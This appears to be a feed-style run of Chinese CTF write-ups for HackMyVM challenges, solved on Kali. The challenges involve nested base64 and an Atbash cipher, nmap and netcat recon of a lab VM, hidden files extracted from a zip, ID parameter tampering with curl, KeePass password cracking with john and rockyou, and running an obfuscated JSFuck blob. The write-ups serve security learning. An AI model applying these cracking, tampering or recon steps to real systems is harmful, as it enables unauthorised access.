'FtbG9aMlpsWkdOaVlWcFpXRmRXVlZSVFVsRlFUMDVOVEV0S1NVaEhSa1ZFUTBKQkp3bz0sIEhWMUR2M1FvQjNFYngyb2V5bTBQXQo=' | wc -c 102 ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ echo -n 'W0oyRmlZMlJsWm1kb2FXcHJiRzF1YjNCeGNuTjBkWFozZUhsNlFVSkRSRVZHUjBoSlNrdE1UVTVQVUZGU1UxUlZWbGRZV1ZvbklDZDZlWGgzZG5WMGMzSnhjRzl1Yld4cmFtbG9aMlpsWkdOaVlWcFpXRmRXVlZSVFVsRlFUMDVOVEV0S1NVaEhSa1ZFUTBKQkp3bz0sIEhWMUR2M1FvQjNFYngyb2V5bTBQXQo=' | base64 -d [J2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVonICd6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYVpZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBJwo=, HV1Dv3QoB3Ebx2oeym0P] ``` J2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVonICd6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYVpZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBJwo= HV1Dv3QoB3Ebx2oeym0P 先解第一段 ```然后有点抽象 ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ echo -n 'J2FiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVonICd6eXh3dnV0c3JxcG9ubWxramloZ2ZlZGNiYVpZWFdWVVRTUlFQT05NTEtKSUhHRkVEQ0JBJwo=' | base64 -d 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' 'zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA' ``` 这明显是一个 **字符映射表**，也就是用于 **简单替换加密**的 左边是明文字符集（小写+大写）： ``` abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ ``` 右边是对应的密文字符映射（即：倒序）： ``` zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA ``` 换句话说，这是一个 **Atbash Cipher** 那你可以直接拿去CyberChef了  这样就出flag了 ``` HMV{recursion} ``` 。https://7r1UMPH.github.io/post/Challenge%20046.htmlSat, 21 Jun 2025 06:02:04 +0000https://7r1UMPH.github.io/post/nei-bu-_easyfmt.html ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ sudo arp-scan -l [sudo] password for kali: Interface: eth0, type: EN10MB, MAC: 00:0c:29:af:40:3a, IPv4: 192.168.205.206 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.205.1 00:50:56:c0:00:08 VMware, Inc. 192.168.205.2 00:50:56:f8:ba:aa VMware, Inc. 192.168.205.139 08:00:27:7c:4c:12 PCS Systemtechnik GmbH 192.168.205.254 00:50:56:fd:86:ce VMware, Inc. 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.063 seconds (124.09 hosts/sec). 4 responded ``` 139的ip，进行服务探测 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ nmap -p- 192.168.205.139 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-20 06:40 EDT Nmap scan report for 192.168.205.139 Host is up (0.00016s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 1337/tcp open waste MAC Address: 08:00:27:7C:4C:12 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 1.21 seconds ``` 有个1337端口，nc上去瞄一眼 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ nc 192.168.205.139 1337 welcome:Where is my password? root:Well,it's in the stack,just find it. ``` 翻译一下 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ echo 'welcome:Where is my password? root:Well,it's in the stack,just find it.' | trans -b :zh 2>/dev/null 欢迎：我的密码在哪里？ root：嗯，它在堆栈中，只是找到它。https://7r1UMPH.github.io/post/nei-bu-_easyfmt.htmlFri, 20 Jun 2025 11:21:45 +0000https://7r1UMPH.github.io/post/Challenge%20045.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 045.zip -rwxr-xr-x 1 kali kali 83848 Jun 17 00:22 045.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 045.zip Archive: 045.zip inflating: image.png ```  ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ 7z x 045.zip 7-Zip 24.09 (x64) : Copyright (c) 1999-2024 Igor Pavlov : 2024-11-29 64-bit locale=en_US.UTF-8 Threads:128 OPEN_MAX:1024, ASM Scanning the drive for archives: 1 file, 83848 bytes (82 KiB) Extracting archive: 045.zip -- Path = 045.zip Type = zip Physical Size = 83848 Would you like to replace the existing file: Path: ./image.png Size: 79263 bytes (78 KiB) Modified: 2023-12-15 11:59:40 with the file from archive: Path: image.png Size: 79263 bytes (78 KiB) Modified: 2023-12-15 11:59:39 ? (Y)es / (N)o / (A)lways / (S)kip all / A(u)to rename all / (Q)uit? Y Everything is Ok Size: 79263 Compressed: 83848 ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ file 045.zip 045.zip: Zip archive data, made by v6.3 UNIX, extract using at least v2.0, last modified Dec 15 2023 10:59:40, uncompressed size 79263, method=deflate ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ file image.png image.png: PNG image data, 304 x 481, 8-bit/color RGBA, non-interlaced ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ exiftool image.png ExifTool Version Number : 13.25 File Name : image.png Directory : . File Size : 79 kB File Modification Date/Time : 2023:12:15 10:59:39-05:00 File Access Date/Time : 2025:06:17 00:24:11-04:00 File Inode Change Date/Time : 2023:12:15 10:59:39-05:00 File Permissions : -rwxr-xr-x File Type : PNG File Type Extension : png MIME Type : image/png Image Width : 304 Image Height : 481 Bit Depth : 8 Color Type : RGB with Alpha Compression : Deflate/Inflate Filter : Adaptive Interlace : Noninterlaced Pixels Per Unit X : 3780 Pixels Per Unit Y : 3780 Pixel Units : meters Image Size : 304x481 Megapixels : 0.146 ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ stegseek image.png StegSeek 0.6 - https://github.com/RickdeJager/StegSeek [!] error: the file format of the file 'image.png' is not supported. ``` strings瞄了一下 并且拿binwalk验证一下 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ binwalk 045.zip DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 Zip archive data, at least v2.0 to extract, compressed size: 79069, uncompressed size: 79263, name: image.png 79108 0x13504 PNG image, 400 x 300, 8-bit/color RGBA, non-interlaced 79644 0x1371C Zlib compressed data, best compression 83826 0x14772 End of Zip archive, footer length: 22 ``` 它塞了点东西 试了一下binwalk不行 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ binwalk --extract 045.zip DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 Zip archive data, at least v2.0 to extract, compressed size: 79069, uncompressed size: 79263, name: image.png 79644 0x1371C Zlib compressed data, best compression WARNING: One or more files failed to extract: either no utility was found or it's unimplemented ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cd _045.zip.extracted ┌──(kali㉿kali)-[/mnt/hgfs/gx/_045.zip.extracted] └─$ ls -al total 650 drwxr-xr-x 1 kali kali 0 Jun 17 00:44 . drwxr-xr-x 1 kali kali 16384 Jun 17 00:44 .. -rwxr-xr-x 1 kali kali 83848 Jun 17 00:44 0.zip -rwxr-xr-x 1 kali kali 480300 Jun 17 00:44 1371C -rwxr-xr-x 1 kali kali 4204 Jun 17 00:44 1371C.zlib -rwxr-xr-x 1 kali kali 79263 Dec 15 2023 image.png ``` 那拿foremost试一下 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ foremost 045.zip Processing: 045.zip ���2��HȠm�I��R��u���2k��,��h�2���6m�}:�g�10d����^ܰьo��M�������׶���y�s�y����so�{M�{��(IHH�(��&!!����7�O�R|��;�A���i������D��k�Of�M��� +)���d���n�+����W����� *| ``` ??? 重新下一遍 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ foremost 045.zip ERROR: /mnt/hgfs/gx/output is not empty Please specify another directory or run with -T. ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ rm -rf /mnt/hgfs/gx/output ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ foremost 045.zip Processing: 045.zip ���2��HȠm�I��R��u���2k��,��h�2���6m�}:�g�10d����^ܰьo��M�������׶���y�s�y����so�{M�{��(IHH�(��&!!����7�O�R|��;�A���i������D��k�Of�M��� +)���d���n�+����W����� *| ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cd output ┌──(kali㉿kali)-[/mnt/hgfs/gx/output] └─$ ls -al total 21 drwxr-xr-x 1 kali kali 4096 Jun 17 00:47 . drwxr-xr-x 1 kali kali 16384 Jun 17 00:47 .. -rwxr-xr-x 1 kali kali 719 Jun 17 00:47 audit.txt drwxr-xr-x 1 kali kali 0 Jun 17 00:47 png drwxr-xr-x 1 kali kali 0 Jun 17 00:47 zip ``` ok，是我显示的问题 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx/output] └─$ cd png ┌──(kali㉿kali)-[/mnt/hgfs/gx/output/png] └─$ ls -al total 9 drwxr-xr-x 1 kali kali 0 Jun 17 00:47 . drwxr-xr-x 1 kali kali 4096 Jun 17 00:47 .. -rwxr-xr-x 1 kali kali 4618 Jun 17 00:47 00000154.png ```  ``` HMV{undercover} ``` 。https://7r1UMPH.github.io/post/Challenge%20045.htmlTue, 17 Jun 2025 04:56:16 +0000https://7r1UMPH.github.io/post/Challenge%20044.html ``` What type of format corresponds to the following address: bc1qspg3vsx3pphrf[...] Flag: HMV{format} 以下地址对应的格式类型为：bc1qspg3vsx3pphrf[...] 标志：HMV{format} ``` bc1一种加密货币（**Bitcoin**）的前缀格式 然后这种地址是使用Bech32 编码方案 ``` HMV{Bech32} ``` 。https://7r1UMPH.github.io/post/Challenge%20044.htmlTue, 17 Jun 2025 04:56:07 +0000https://7r1UMPH.github.io/post/Challenge%20043.html 从此 MS Excel 文件中捕获标志。https://7r1UMPH.github.io/post/Challenge%20043.htmlTue, 17 Jun 2025 04:55:58 +0000https://7r1UMPH.github.io/post/Challenge%20042.html ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl -i http://momo.hackmyvm.eu/n1lsfr4hm/ HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Jun 2025 04:02:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive <a href='/index.php?user=1'>John</a> <a href='/index.php?user=2'>Monroe</a> <a href='/index.php?user=3'>Vault</a> <a href='/index.php?user=4'>{</a> <a href='/index.php?user=6'>Wesley</a> <a href='/index.php?user=7'>Teresa</a> <a href='/index.php?user=8'>Fredric</a> <a href='/index.php?user=9'>}</a> ``` 少个5 访问一下 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl -i http://momo.hackmyvm.eu/n1lsfr4hm/index.php?user=5 HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Jun 2025 04:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive <a href='/index.php?user=1'>John</a> <a href='/index.php?user=2'>Monroe</a> <a href='/index.php?user=3'>Vault</a> <a href='/index.php?user=4'>{</a> <a href='/index.php?user=6'>Wesley</a> <a href='/index.php?user=7'>Teresa</a> <a href='/index.php?user=8'>Fredric</a> <a href='/index.php?user=9'>}</a> <br><br><br>o_O ``` 没提示，然后就试呗 10没东西 11-20告诉我们没有办法 0没有东西 -1显示了flag ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ curl -i http://momo.hackmyvm.eu/n1lsfr4hm/index.php?user=-1 HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 17 Jun 2025 04:08:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive <a href='/index.php?user=1'>John</a> <a href='/index.php?user=2'>Monroe</a> <a href='/index.php?user=3'>Vault</a> <a href='/index.php?user=4'>{</a> <a href='/index.php?user=6'>Wesley</a> <a href='/index.php?user=7'>Teresa</a> <a href='/index.php?user=8'>Fredric</a> <a href='/index.php?user=9'>}</a> <br><br><br>HMV{fcknumbers} ``` 。https://7r1UMPH.github.io/post/Challenge%20042.htmlTue, 17 Jun 2025 04:55:49 +0000https://7r1UMPH.github.io/post/Challenge%20041.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 041.zip -rwxr-xr-x 1 kali kali 1824 Jun 16 23:26 041.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 041.zip Archive: 041.zip extracting: Challenge.kdbx ``` **KeePass** 数据库文件 应该是破解密码 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ keepass2john Challenge.kdbx > hash ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash Using default input encoding: UTF-8 Loaded 1 password hash (KeePass [SHA256 AES 32/64]) Cost 1 (iteration count) is 2542373 for all loaded hashes Cost 2 (version) is 2 for all loaded hashes Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes Will run 8 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status amigos (Challenge) 1g 0:00:00:51 DONE (2025-06-16 23:29) 0.01944g/s 9.953p/s 9.953c/s 9.953C/s teiubesc..letmein Use the '--show' option to display all of the cracked passwords reliably Session completed. ``` 按个KeePass客户端 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ sudo apt install keepassxc ```  ``` HMV{EasyPeasyMoney} ``` 。https://7r1UMPH.github.io/post/Challenge%20041.htmlTue, 17 Jun 2025 04:55:39 +0000https://7r1UMPH.github.io/post/Challenge%20040.html 下载 ``` ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ ll 040.zip -rwxr-xr-x 1 kali kali 528 Jun 16 23:22 040.zip ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ unzip 040.zip Archive: 040.zip inflating: 040.txt ┌──(kali㉿kali)-[/mnt/hgfs/gx] └─$ cat -A 040.txt [][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]]((!![]+[])[+[]])[([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]](([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]]+![]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])()[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])+[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]])()) ``` 这是一种叫**JSFuck** 的JavaScript 编程风格，拿去浏览器控制台执行一下就ok了 打开网页about:blank  ``` HMV{jslovesxss} ``` 。https://7r1UMPH.github.io/post/Challenge%20040.htmlTue, 17 Jun 2025 04:55:26 